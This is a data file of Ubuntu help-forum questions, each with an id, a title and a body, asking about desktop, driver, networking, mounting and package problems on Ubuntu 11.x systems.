74713	how can i copy/paste files via rdp in kubuntu ?	i recently installed the latest kubuntu ( x64 ) on my work machine as i am trying to migrate away from windows . unfortunately i use rdp very frequently to connect to customer 's servers and need to be able to copy files across . i have tried the following packages with no luck : remmina rdesktop xfreerdp my latest attempt to solve this involved connecting one of my folders to the remote server , here is the command i used to launch rdesktop : rdesktop -5 -k -r disk : home=/home/dai -r clipboard : clipboard -r sound : off -x l -p 192.168.0.2 -u `` administrator '' -p pass the servers are not all running the same version of windows , the one i 've been trying so far is running server 2003 r2 . customer servers range from server 2000 to server 2008 . i 've been googling this like mad but all the solutions i find seem to fail , maybe because almost all the help out there assumes that i 'm running gnome . sorry if this is a stupid question . thanks in advance for your help . edit : copying and pasting text seems to work just fine , but that 's not what i need .
74715	how to install ubuntu onto a 2gb flash drive ?	i have a development board with intel atom processor , ich8m chipset , 1gb ram , 2gb flash memory . so basically it 's a netbook configuration already , but without hard drive . is possible to install ubuntu into the on board 2gb flash memory using a usb drive ?
74720	black screen after resume ( ati radeon 6320 )	i buy acer aspire 4250 yesterday . it has ati radeon 6320 graphics card . i installed latest graphics driver from ati site . graphics and other facilities are just working nice . problem is it does not wake up from sleep . after suspend screen goes black . power led is on but screen is black . how to debug or solve this problem . thanks in advance . note : i see same named post in askubuntu but no is related to my problem . so i create a new post . sorry for that
74722	upgrading xubuntu broke brazilian keyboard	i upgraded by xubuntu notebook to 11.10 and accents in my brazilian keyboard no longer work . they work neither in the basic brazilian keyboard layout nor does the compose key work in the nodeadkeys layout .
74729	rhythmbox crashing when syncronizing and adding playlists to ipod	is the syncronizing and adding playlists on an ipod in rhythmbox bug fixed ? or is it something in the settings i need to change ?
74732	network manager does not show edit connections dialogue	nm applet icon constantly appears and disappears when connected to wireless . when the icon is present it 's possible to open connection information but edit connections dialogue never opens , even in system settings - network - wireless - configure . it 's impossible to add / edit connections . please help if anyone knows how to fix it .
74735	how to start unity 3d	the unity_support_test showed `` yes '' in every item , but when signing in i can only choose between ubuntu and ubuntu 2d ( card is geforce 6600 gt ) . what can i do to start the 3d-mode ? hubert
74736	python problem during bibus installation	i can not install bibus from the application centre . i am a new user of ubuntu and i found it is very helpful . when i was trying to install bibus , they told me the package dependencies can not be resolved : bibus : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.7.2-7ubuntu2 is to be installed . i tried to install the package manually , but it does not work still .
74740	help me to add line to file password /etc/shadow	when i try to add line inside /etc/shadow : echo -e `` admin234 : ! ! :0:0:99999:7 : : : '' > > /etc/shadow 1 2 3 the console show this message : -bash : 0 : unrecognized history modifier or -bash : :14790 : bad word specifier ( when change 3 to :14790 : ) help ?
74746	create shortcut from command	how can i achieve the following : type vdm in the terminal and that will be replaced by wine program files/the vdm++ toolbox lite v8.3.1/bin i also wanted vdm to work in any folder i am whatsoever .
74747	how to fix webdav access in nautilus ?	in lucid i could just by typing in the address bar . from maverick onwards ( ocelot included ) , doing this or using the connect to server option , does not work for accessing dav shares . so could someone tell me how to fix the problem ? it is the same as the launchpad bug lp:697158
74756	how to make script support file : /// notation ?	when i copy any file and paste it in console or text editos it is passed as file : ///home/user/path/file when i pass it to script it is not found what is the easiest way to convert that to normal linux path or somehow make script support it ? for example cat file : ///home/user/path/file says no such file or directory
74757	ubuntu , ubuntu ( no effects ) , gnome , gnome classic	these are the various options of ubuntu that i am asked to chose from.how do these differ ?
74761	how do i manually install grub ?	i was installing ubuntu 11.10 and the bootloader install failed . i tried installing it again but it did n't work so i want to know how to install grub manually . thanks .
74762	gnu backgammon wo n't start	i 'll select the app gnu backgammon to start but nothing changes and the icon is n't shown in the panel . i considered that my graphics driver was the problem but even after activating the additional driver nothing changed . after running it in the terminal i got : gnu backgammon 0.90.0 may 1 2011 copyright ( c ) 1999 , 2000 , 2001 , 2002 , 2003 , 2004 by gary wong . copyright ( c ) 2009 by gary wong and the authors ; for details type show version ' . this program comes with absolutely no warranty ; for details typeshow warranty ' . this is free software , and you are welcome to redistribute it under certain conditions ; type `show copying ' for details . ( gnubg:6003 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gnubg:6003 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gnubg:6003 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gnubg:6003 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , the program 'gnubg ' received an x window system error . this probably reflects a bug in the program . the error was 'badrequest ( invalid request code or no such operation ) ' . ( details : serial 151 error_code 1 request_code 155 minor_code 19 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) i am using ubuntu 11.10
74765	current status/known issues for dell xps 15z ?	i 'm planning on buying a dell xps 15z laptop . i was wondering what is the status for running 11.10 on it ? are there any known issues that might be difficult to solve ( specifically regarding installation ) ? i 've read of difficulties with wireless connectivity , touchpad and nvidia but all the posts seem to be quite old and possibly not currently relevant .
74770	error after installing proprietary driver for graphic card	i 'm using ubuntu 11.10 + gnome 3 . before i installed proprietary driver for my discrete card , everything had worked fine ( system indicator , activities corner , dash , ... ) . after installing the driver , the interface corrupted . everything 's gone except for a bar which contain : file , edit , view , help , ... . and the desktop , i can not use alt+f2 nor windows button even when i uninstalled the driver , nothing 's changed : ' ( i doubt that the proprietary driver has n't been entirely removed or the system can not switch to the old integrated card . how can i get things back ?
74774	how do you assign multiple keyboard shortcuts for one action ?	how do you assign multiple keyboard shortcuts to one action . specifically i would like to have multiple keyboard shortcuts to lock my screen . thanks
74775	why is /mnt/hgfs not appearing ?	this might be a basic reason , but somehow i have not been able to achieve it . i am running a guest kubuntu os on a windows one , and i am trying to share a folder between oses . the vmware tools have been installed properly , vm - > settings - > options - > share folders is set properly , and my windows folder is shared . any idea what else could prevent the hgfs folder to appear ?
74776	option to re-enable compiz missing in the appearance settings , how do i enable it ?	i have been upgrading my desktop for several version now and have been using metacity , the option to renable compiz is no longer in the appearance settings . what is the best way to do this so it is persistent across restarts ? ( save it to my gnome session )
74780	how to execute script in different directory ?	i tried this ./home/user/scripts/somescript but it does n't work no such file or directory any ideas ?
74783	where can i get monodevelop .deb to install while off-line ?	i want to install monodevelop in offline mode on 11.04 as i do n't have internet connection . i searched monodevelop site which is redirecting me to badgerports but could n't find the .deb package . please help me find offline installer/.deb package of monodevelop . thanks .
74788	how do i uninstall postgres ?	how can i completely uninstall postgres and reinstall it . i have tried : sudo apt-get -- purge remove postgresql postgresql-doc postgresql-common but i got : package postgresql is not installed , so not removed package postgresql-doc is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : postgresql-client-8.4 : depends : postgresql-client-common ( > = 104~ ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
74789	`` failed to retrieve share list from server '' error when browsing a share with nautilus	a bit before upgrading from 10.04 to 11.10 , my ubuntu desktop stopped allowing me to access my windows share directories . i figured i 'd upgrade to 11.10 and the problem would get fixed but no . whenever i click on a windows network domain using nautilus , the message : '' unable to mount location - failed to retrieve share list from server `` pops up . where do i start troubleshooting this problem ? i am getting desperate now : ( i tried sudo mount -t cifs //somemachine/someshare some_directory and i get mount error ( 115 ) : operation now in progress strangely enough , i got a popup stating : could not display network : /// error : dbus error org.freedesktop.dbus.error.noreply : did not receive a reply ...
74790	compiz disables 3rd monitor	i have a try monitor setup with using the proprietary ati drivers : this works pretty well with metacity , with the exception of some maximize strangeness . on monitors 3 and 2 it works as expected . however , if maximize a window while it is with monitor 1 it maximizes on monitor 3 . so i figured i would try compiz . when i start compiz with compiz -- replace monitor 1 ( forgive the backward numbering ) goes black . the monitor does not lose power . i can still see the cursor if i move my mouse over to it , however compiz will not let me drag any windows to monitor 1 . i tried to set my outputs in comizconfig settings manager but it does n't seem to make a difference :
74795	notebook not shutting down , problema con ubuntu 11.10	a fine sessione , premendo `` arresto '' , il notebook non si spegne . rimane bloccato con un immagine tutta `` confusa '' . aiutatemi , grazie translated to english : `` at the end of the session , pressing `` stop '' , the notebook is off . remains stuck with a whole picture , `` confused '' . help me with '' possible alternate translation : at the end of the session , by pressing `` shutdown '' , the notebook is not suspending . it remains stuck with a picture all `` blurred '' . help me , thanks
74796	export commands ignored in /etc/apache2/envvars script -	maybe this belongs to serverfault or launchpad.net , but here we go anyway : in oneiric , there is an export command in this script /etc/apache2/envvars , setting lang . this gets ignored on my server . any idea why ? i had two more commands in script /etc/apache2/envvars export sybase=/opt/sybase export sybase_ocs=ocs-15_0 but they get ignored as well as the output from the printenv.cgi script shows . is this a bug or a security feature in oneiric ? note that the answer from sep 27 2011 at 17:29 to this question explicitly says that admins should add export commands to /etc/apache2/envvars . i found this : a quote from the oneiric changelog regarding package sbox-dtc - removed the use of apache envvars which are n't safe ( easy to hack ) .
74797	mute sound in one of the two speakers	sound is working only on the left side , when i open the sound configuration tool there is no hardware there but if i run lspci -v | grep -a7 -i `` audio '' i get this output : 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) subsystem : asustek computer inc. device 8290 flags : bus master , 66mhz , fast devsel , latency 0 , irq 22 memory at dbff8000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel i can see that the system is using the intel hda driver but the hardware listed is the nvidia mcp61 high definition audio . i wonder if that is the correct driver for my sound card . is it because i am running on 64bits ? this is the output of sudo aplay -l **** lista de dispositivos playback hardware **** placa 0 : nvidia [ hda nvidia ] , dispositivo 0 : alc662 rev1 analog [ alc662 rev1 analog ] dispositivo secundรกrio : 1/1 dispositivo secundรกrio # 0 : subdevice # 0 placa 0 : nvidia [ hda nvidia ] , dispositivo 1 : alc662 rev1 digital [ alc662 rev1 digital ] dispositivo secundรกrio : 1/1 dispositivo secundรกrio # 0 : subdevice # 0 there are 2 devices there , 1 analog and 1 digital . does that mean there is a conflict ? ? ?
74801	can not execute files on mounted file systems	i have a fat32 file system , which i mount from the gui file browser in 11.10 , i can create and edit and save files in the mounted partition but i can not set the execute bit in it . i tries chmod +x but that also has no effect even when i do it as root . it seems that execute permission is being turned off on all files by default on mount from gui . is there a way to turn it on so that every time i mount i can execute files
74803	formatting usb stick with 11.10 is unreadable with windows 7	if i format a usb stick ( any ) on my ubuntu 11.10 system , they are unreadable with my windows 7 system . i have tried both ntfs & fat but windows refuses to see the drive as having been formatted ( it reports it as raw in disk management console ) . this has been done with disk utility , gparted , & mkfs ( mkfs.vfat / mkfs.ntfs ) but nothing seems to work . if i do this the other way ( i.e . format on windows ) i can copy files to it through ubuntu and then see them with win7 . i 'm fairly new to ubuntu ... .
74804	unable to format minisd card	i have a 2gb mini-sd card that i am trying to format . the drive is currently formatted for use with a pandaboard . it has 2 partitions - 1 x fat32 - 1 x ext3 usually , i unmount the partitions then run the script that re-partitions the card ready for me to use with the pandaboard . however , if using disk utility i tell it to format with 'do n't partition ' it seems to do it , but when ejected and reinserted is back to the way it was . the same thing happens with fdisk and gparted ... what can i do ? windows wo n't touch it either and my macbookpro says the device is busy the whole time ! very confusing as i am fairly new to the linux world !
74806	how can i change permissions on external drives ?	i wanted to change permissions on my external drives that are automounted however i have tried by sudo nautilus and then going to gui and permissions and changing it however it does not let me . i ran the ls -l and get drwx -- -- -- 1 xbmc xbmc the gui shows below . owner xbmc folder access create and delete files file access -- - group xbmc folder access none file access -- - others folder access none file access -- - how can i change it so that everyone has permission to access the drive and all folders/files inside of it . i am trying to get plexmedia server running and i cant see my drives via the webpage manage to add it to my source to be able to stream my content . i want to change the `` others '' access so that i can access all my drives on the /media path to get read and write for all my folders from anywhere . you can see my drives that are mounted here ( external drives are # 18,19,20 ) http : //paste2.org/p/1754386
74808	how do i force a resolution of 1024x768 ?	back in ubuntu 9 , maximum resolution supported was 960x600 , by editing xorg.conf i was able to get 1024x768 resolution . i recently installed ubuntu 11.10.. now again maximum resolution i can get in display panel is 960x600 .. i tried editing xorg but there was no xorg and when i tried to create one access was denied . i 'm new to linux commands so , step by step help will be appreciated . i added /etc/x11/xorg.conf containing : section `` device '' identifier `` configured video device '' endsection section `` monitor '' identifier `` configured monitor '' horizsync 30.0-62.0 vertrefresh 50.0-70.0 endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1024x768 '' `` 800x600 '' endsubsection endsection
74813	change the verbosity of wpa_supplicant when managed by network-manager/dbus	wpa_supplicant writes to /var/log/syslog . you can run it with option -d or -dd to add verbosity , but it is started automatically by network-manager/dbus so you do n't get to enter your own options . how do you increase verbosity anyway ?
74815	how to enable read/write for windows partitions ?	with 11.04 i could read and write my partitions that was created in windows however after upgrading to 11.10 somehow i can only read those partitions . how do i enable this ability in 11.10 ?
74822	how to restore a process after logging out of ssh connection ?	say i 'm running a minecraft server on my ubuntu server and i log into this machine from a remote ubuntu machine over ssh . i startup the server running a script i have e.g . minecraft . if i want to log out and keep the server running , i usually minecraft & . say i actually log out after running minecraft & . i log back in an want to restore the same info window i get when i originally ran minecraft & . how would i restore this ?
74824	how do you get gnome-shell to show the full name ?	i 've been using gnome-shell and i really like it . i was wondering though if it 's possible to somehow get gnome-shell to display the full name of an application in the activities- > applications browser if the name is too long . for an example of what i mean : i have two icons for battle for wesnoth in the games filter . both of them apparently have names too long to display entirely and end in `` ... '' . is there a way to either tell gnome-shell to display the names or to have them appear as a tooltip or something ?
74825	why do n't shared files show up in hgfs ?	sharing files between my guest kubuntu os and host windows has become a real headache . so , far i have done the steps below : guest linux os vm - > settings - > options - > shared folders . and added my folder . installed properly my vmware tools ( i can drag and drop files so i am confident that it is installed ) host windows os shared the folder with everyone ( to assure that there is no permit limitations with my files ) if i type vmware-hgsclient in my guest os , the folder i am sharing does appear . but when i check the /mnt/hgfs folder , it is empty . i have gone through the vmware manual , and i am sure that i have followed their requirements . i am really out of ideas . any one has a suggestion ?
74830	kernel multitouch events injection / example / source where can i find ?	i 'm developing a kernel driver for a multitouch digitizer . how can i find an example of how should the event be injected to the os subsystem ? is there any open source driver out there that could serve as a start point ? is there any place where i can find official documentation about this ? any help regarding to this would be great . thanks in advance , with my best regards , nuno
74831	will 7000+ fonts slow down my system ?	i 've just recently download the whole collection of open source fonts hosted by google , and was wondering if installing them on my computer would cause performance issues . the aforementioned computer has a processor clocked at 2.3 ghz and 1.8 gb 's of ram . if you 've had experience with large collections of fonts on ubuntu , please let me know how your computer preformed in the answers below .
74834	missing title bars of every window	recently i did re-install empathy , and installed pidgin . i do n't think this is related to gnome system . i do n't know what else i did , but all the window 's title bars are gone . basically i ca n't move the windows . i tried 'metacity -- replace ' , and by doing so the title bars appear as normal but it crashes the x system eventually . after reboot , i do n't see title bars again . any suggestions ?
74835	how do i use libreoffice 's 3d transitions in impress ?	how can i get the 3d transitions working on impress ? i got a presentation coming soon , and as a requirement of the course the professor want us to use transitions on our `` power point '' chapter , obviously i have been using libreoffice in every exercise but the native transitions are kind of lame , so when i install the newer version of ubuntu , always install the extra package to the transitions - i had installed the 3d package : libreoffice-ogltrans 1:3.4.3-3ubuntu2 in previous versions of ubuntu and worked perfectly , but for some reason is not working in this release . i got libreoffice 3.4.3 , ubuntu oneiric ocelot ( 11.10 ) and my hardware is not relevant because i had it working before on previous releases . i know is not critical , but for my class is a pretty important deal , and can be a perfect opportunity to show the class that the cool stuff are not only in windows . as a recomendation of one of eliah kagan , i 'm putting the output of : sudo lshw -c video *-display:0 description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : f6c00000-f6ffffff memory : e0000000-efffffff ioport : efe8 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : f6b00000-f6bfffff and i 'm not using unity - it do n't there anyways - , i 'm using instead gnome shell .
74838	how do i completely remove samba ?	how do i completely rip-out smb / samba from my ubuntu 11.10 machine ? how do i , afterwards , reinstall it cleanly ? update : my goal is to rip out any functionality related to windows smb from my desktop and do a clean re-install of these components . see this question for some background .
74839	how can i get permanent 5.1 sound ?	i have a lenovo ideapad y510 with 5.1 sound and worked perfectly on windows . i read a guide to get 5.1 sound on ubuntu which proposes to do the following . edit /etc/pulse/daemon.conf and change the default-sample-channels from 2 to 6 . then edit /etc/modprobe.d/alsa-base and add the line options snd-hda-intel model=3stack-6ch-dig and restart the system . after the first reboot the sound works perfectly , but when i power off or restart the machine the sound does not work . how can i make those changes permanent ?
74840	where are the network manager configuration files ?	i have a network that my machine tries to connect to automatically ... it 's a network that requires leap authentication so i have a username stored with the network . however , my username has changed but the network does not show up in the list when i do `` edit connections '' . where is the configuration file so that i can edit it by hand ?
74845	ubuntu software center , update manager not working after failed upgrade	i tried upgrading ubuntu 11.04 , but unfortunately my network fails and the upgrade stops . due to that i ca n't access the ubuntu software center and update manager ; i ca n't even remove the update manager . if i want to install or remove it via apt-get , this output results for me on my terminal . mnass @ mnass-extensa-4230 : ~ $ sudo apt-get remove update-manager reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ng.archive.ubuntu.com_ubuntu_dists_oneiric-updates_restricted_i18n_translation-en e : the package lists or status file could not be parsed or opened .
74855	problem installing java	i have not used the ubuntu software center or the apt-get for java installation . learning from a ubuntu discussion thread that a manual download and install would give me the capability to place java anywhere , i 've downloaded the sun jdk bin package and executed the ./package in the downloads folder . i see that the jre1.6_0 is installed in the downloads directory itself . now i am stuck . where should the jre folder typically be ? usr/bin is it ? ? is it okay if i just cut and paste the installed jre folder to the specified location ? so where should the folder typically reside and how to set the path ? please help
74859	ca n't boot after trying to extract an archive	i was trying to extract an archive , then my computer froze , so i pressed the power button to shut it down . after that , i can not boot ubuntu , it stops at the purple screen . please note that i am running ubuntu 11.10 , with windows 7 thanks
74863	is an easy way to import .dbf file contents into mysql in terminal	i 've got this files : /referencias $ ls | grep .dbf avenidas.dbf barrios.dbf borde.dbf construcciones.dbf espejo_de_agua.dbf manchas_urbanas.dbf manzanas.dbf plazas.dbf i want to do but in the terminal . any idea ? thanks to roadmr : this is how i did it . dbf2mysql -vv -q -h localhost -p my.password -u root avenidas.dbf -d avenidas -c dbf-file : avenidas.dbf - dbase iii w/o memo file , mysql-dbase : avenidas , mysql-table : test number of records : 60 name length display type -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - nmbre_comp 150 0 c tipo 4 0 c codigo 16 0 n load data local infile '/tmp/d2myco7f7o ' replace into table test fields terminated by ' , ' enclosed by ' '' ' after that checked on mysql . # mysql -p enter password : welcome to the mysql monitor . commands end with ; or \g . your mysql connection id is 47 server version : 5.1.58-1ubuntu1 ( ubuntu ) copyright ( c ) 2000 , 2010 , oracle and/or its affiliates . all rights reserved . this software comes with absolutely no warranty . this is free software , and you are welcome to modify and redistribute it under the gpl v2 license type 'help ; ' or '\h ' for help . type '\c ' to clear the current input statement . mysql > use avenidas ; reading table information for completion of table and column names you can turn off this feature to get a quicker startup with -a database changed mysql > show tables ; + -- -- -- -- -- -- -- -- -- -- + | tables_in_avenidas | + -- -- -- -- -- -- -- -- -- -- + | test | + -- -- -- -- -- -- -- -- -- -- + 1 row in set ( 0.01 sec ) mysql > describe test ; + -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- + -- -- -+ -- -- -- -- -+ -- -- -- -+ | field | type | null | key | default | extra | + -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- + -- -- -+ -- -- -- -- -+ -- -- -- -+ | nmbre_comp | varchar ( 150 ) | no | | null | | | tipo | varchar ( 4 ) | no | | null | | | codigo | int ( 11 ) | no | | null | | + -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- + -- -- -+ -- -- -- -- -+ -- -- -- -+ 3 rows in set ( 0.00 sec ) mysql > \q bye
74864	empathy unable to automatically connect at startup	i have a problem with empathy being unable to automatically connect at startup . i have noticed that when empathy is started manually it logs in automatically but ubuntu still notifies password required . is this a problem with the gnome keyring ?
74867	does installing more desktop environments break my system ?	i plan to install ubuntu 11.10 64 bit and then install xfce , gnome and kde desktops from usc . will it break my system ?
74868	is there any alternative to workrave in 11.10 ?	workrave package had removed from oneiric , and setting for blocking screen removed from gnome 3 ( it was in keyboard settings in gnome 2 ) . is there any alternative to control working time on computer in ubuntu 11.10 ?
74878	acer aspire one sometimes freezes on startup	i have an acer aspire one with a dual core amd 1ghz processor and 2gb of ram . i have ubuntu 11.10 installed ( full install , not wubi ) . i had this problem when i was using wubi , and i thought a full install would fix it but most of the time when i boot up ubuntu , after about 15 seconds on the desktop , it freezes , neither the mouse does not move nor clicking does not work , key combinations do n't work . i am a relative n00b to linux but is there any way to fix this ?
74879	how can i stop nautilus from drawing a menu bar in awesome wm running gnome-session ?	i use the command gnome-session to start gnome services while i 'm using awesome wm . the problem with this , though , is that it shortly after it has nautilus draw the desktop wallpaper , it adds a nautilus menu bar to this , drawn under the awesome wm wibox . aesthetically , this is problematic , since it draws an extra few lines of beige where there should n't be any , but it also causes functional problems , too : sometimes what i type gets interpreted as a nautilus file search , and a little box appears in the lower right corner of the screen . i tried using the command gnome-settings-daemon instead , but with that , nautilus does n't draw the wallpaper at all at first , and it only appears after i 've gone through a suspend and resume .
74881	how do i downgrade to 11.04 ?	i worked with ubuntu 11.04 very well . then i was promted to upgrade to 11.10 which i did . but 11.10 does not work for me . the system gets stuck and behaves very badly . so i want to go back to 11.04 . what is the easiet way to do that ?
74895	running evince get error : gdk_window_get_pointer ?	whenever i run evince on terminal , i get this number of the same error messages saying gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed is it normal ? or is there any way to fix this problem ?
74897	which is the right location i.e . partition to install ubuntu 11.10 using wubi ?	as the wubi installer gives you all options for all partitions on hard disk which is the right and good option to select ? on c : where windows 7 installed or another d : ?
74898	ca n't adjust using brightness keys on an hp dv6 6080 and ca n't using projector switch button	i use ubuntu 11.10 64bit on my hp dv6 6080 laptop . i have problem in ubuntu 1 ) i ca n't adjust lcd brightness in ubuntu with brightness keys . how can i adjust lcd brightness because lcd brightness offend my eyes . please help me 2 ) i ca n't switch to projector with switch button above buttons work on win7 but i ca n't use them on ubuntu !
74901	converting .mov to file compatible with my sony playstation 3 without losing quality	i read the latest post on canonical design on a film titled `` press pause play '' here : http : //design.canonical.com/2011/11/when-humans-make-stuff-we-tend-to-make-interesting-things/ i have been on the official website and downloaded the 1080p version of the film , the only available format to download is .mov which is not compatible to play on the playstation 3 . how would i convert the file to something playable on the playstation without losing the 1080p hd video quality ?
74904	how can i swap capslock for backspace ?	i want to swap capslock with backspace and came only so far as to mix them both together . by that i mean : hitting capslock does work like the backspace key , but also activates caps ( including the led ) . when i was using gnome , the keyboard settings would let me easily do the switch . in xfce these options are missing , so i tried via .xmodmap and xkeycaps . xkeycaps even lets me export the stuff to .xmodmap , but somehow it does not work . i 'm missing something here ! current .xmodmap ( commented out because it gives errors `` bad keysym in remove modifier list 'caps_lock ' , no corresponding keycodes '' , this was mostly described in forums ) keycode 66 = backspace ! remove lock = caps_lock remove mod5 = mode_switch mode_switch referencing xmodmap to load in .profile etc did not work either . i could live with installing the gnome-keyboard settings tool on my xfce system , if nothing else helps - which package is it ? edit : setxkbmap -option caps : backspace works , but : key does not repeat on holding down unless i use xmodmap -e `` clear lock '' as well . not quite elegant , but apparently working .
74907	i ca n't see or use common ui elements	i 'm using ubuntu 11.10 for a few days on my laptop and today unity hang up . so i restarted my laptop . the situation now is , that i can see my wallpaper and the password-dialog to unlock the key ring . i also see the menu in the top left with `` datei '' ( `` file '' in english ) , `` bearbeiten '' ( `` edit '' ) , and so on . there is nothing on the panel in the top right and no menu on the left hand side . if i wait until the screen gets black , i have to unlock the session and if i do so , there is the same situation again . switching to the console and back is without success , too . what can i do ?
74912	altering the backlight dim timeout on a thinkpad laptop	it seems something else than gnome-power-manager manages the backlight dim timeout on thinkpads , maybe thinkpad-acpi . how do you alter the timeout from 5 seconds ? ( which is very annoying )
74914	how can i integrate updates to a installation cd/dvd ?	i have this question about how to integrate updates to a installation cd/usb , like a slipstream in windows . is this possible to make ? thanks for answering.-
74918	long time to boot -180 seconds-	could you help with my boot time . i´ve tried some solutions with no results , including : nomodeset as grub boot option kernel upgrade to 2.6.39 here´s the image of bootchart http : //i.stack.imgur.com/ps1e4.png and here´s the dmesg & lsmod | grep tpm -at the end- output http : //dl.dropbox.com/u/38927870/dmesg % 20output.txt on ubuntu 11.04 , kernel 2.6.38-12-generic , graphic card : nvidia geforce 8400m gs thanks in advance
74924	wlan : can connect to ap but not to network	i 'm tryin to connect to the internet using my thinkpad t60 running ubuntu 11.04 via my wlan router ( a fritz ! box fon wlan 7270 configured to use wpa-psk ) . this is no problem using a wired connection to the router , so i know that the router 's connection to the internet is not the problem . i can also connect to my router using wpa_supplicant : # wpa_supplicant -iwlan0 -cwpasupplicant.conf -dwext trying to associate with 00:21 : fe:05:13 : b3 ( ssid='foobar ' freq=2412 mhz ) associated with 00:21 : fe:05:79 : b3 wpa : key negotiation completed with 00:21 : fe:05:79 : b3 [ ptk=ccmp gtk=tkip ] ctrl-event-connected - connection to 00:21 : fe:05:79 : b3 completed ( auth ) [ id=0 id_str= ] iwconfig shows that i 'm indeed connected : wlan0 ieee 802.11abg essid : '' foobar '' mode : managed frequency:2.412 ghz access point : 00:21 : fe:05:79 : b3 bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=70/70 signal level=-38 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:19 missed beacon:0 here 's the output of ifconfig : wlan0 link encap : ethernet hwaddr 00:1b:57:2e:2f:2d inet6 addr : fe80 : :21b:77ff : fe2e:2f2d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:22 errors:0 dropped:0 overruns:0 frame:0 tx packets:153 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3142 ( 3.1 kb ) tx bytes:36573 ( 36.5 kb ) also , if i connect to my router using a wired connection and then run the wpa_supplicant call above i can access the router 's status page ( over the wired connection ) which then shows my laptop as being connected via wlan , too . however , if i only run that wpa_supplicant command without any cables attached , then i get no access to the network . i ca n't ping the router via its static ip : # ping 192.168.178.1 connect : network is unreachable the end of the output of dmesg is [ 3903.459642 ] wlan0 : associated [ 3903.461648 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 3913.712125 ] wlan0 : no ipv6 routers present could this be a ipv4 vs. ipv6 problem ? how do i continue debugging this ? thanks for any pointers !
74925	must login twice before entering unity ; first login screen has graphical anomalies	when booting my computer i am first presented with the regular lightdm login screen except there are some graphical anomalies in the top 5th of the screen . when i press a key on the keyboard the graphical the anomalies change in a similar fashion to the matrix code . probably the best way to explain what this looks like is having a few characters ( similar to what you get when you open a binary file in a text editor but in small font ) being overlaid on the login screen . when i press more keys it 's as if those events are being written into the screen buffer and i 'm looking directly at a memory map . this even happens when i press 'shift ' . once i enter my password the screen flashes and i have another lightdm login screen but this time without the anomalies . on entering my password again i can login to unity and everything seems fine . i am running the 64-bit version of oneiric ocelot with nvidia 280.13 drivers . it has only started within the last week or so , which corresponds to when i was installing software to allow screen rotation and also a large set of software centre updates ( including kernel update ) .
74928	how to get httpd -s running in ubuntu ?	i have /etc/apache2 and i included my fedora httpd.conf virtual host files and wanted to check the details . but i get this . how to get it working ? # httpd -s no command 'httpd ' found , did you mean : command 'dhttpd ' from package 'dhttpd ' ( universe ) command 'xttpd ' from package 'xtide ' ( universe ) command 'thttpd ' from package 'thttpd ' ( universe ) httpd : command not found
74931	software made with quickly is missing an icon in the dash	i am currently trying out quickly create . when issuing quickly package it packages fine and i can install the deb . only thing is , there is no icon in the dash for my program . how do i go about making one ? i was told quickly takes care of this but in my case this does n't seem to be happening .
74937	how to never hide unity launcher ? ( using ccsm did n't work )	i 've just installed ubuntu 32-bit in a vm . i 've downloaded ccsm from the software center , set `` hide launcher '' to `` never '' , but it still disappears , what can i do ? also , changing the icon size does n't seem to work either .
74943	how do i get a gyration media center universal remote control ( gyr3101ca ) working ?	i have this remote , and i would like to set it up so it 's working with ubuntu and mythtv .
74947	how do i use conky to monitor my mythtv backend ?	i would like to use conky to monitor a mythtv backend , how can i set this up ?
74952	switching between integrated and discrete graphics at boot time	on my new laptop ( lenovo t520 ) , there are two graphics cards : integrated intel and a nvidia card . the laptop supports optimus , but since this is currently only supported in win7 ( i am aware of the various efforts to support it in linux ) , i use the bios setting to disable the integrated intel card , and only use the nvidia graphcis . all is well when i 'm at my desk . using the nvidia graphics ( i installed the driver nvidia-current ) , i can hook up two external monitors ( two external monitors is not possible using intel graphics ) . here 's the issue : i sometimes use the laptop on battery . when on battery , i would like to use intel graphics , since it uses less power . when starting the computer on battery , i enter bios setup to disable nvidia and enable intel graphics . when i tried this i got a blank screen after the nvidia driver loaded . my question : how do i set up the os so it uses the correct drivers in this case ? it does n't have to be automatic , i would be perfectly happy to make a manual selection at some point during the boot process .
74956	how to auto mount disk drives in gnome-shell ?	i have 1 usb disk and 1 esata disk plugged in my pc . when i log in gnome-shell the usb one is mounted automatically . is there any way to mount the esata disk too , without modifying fstab ?
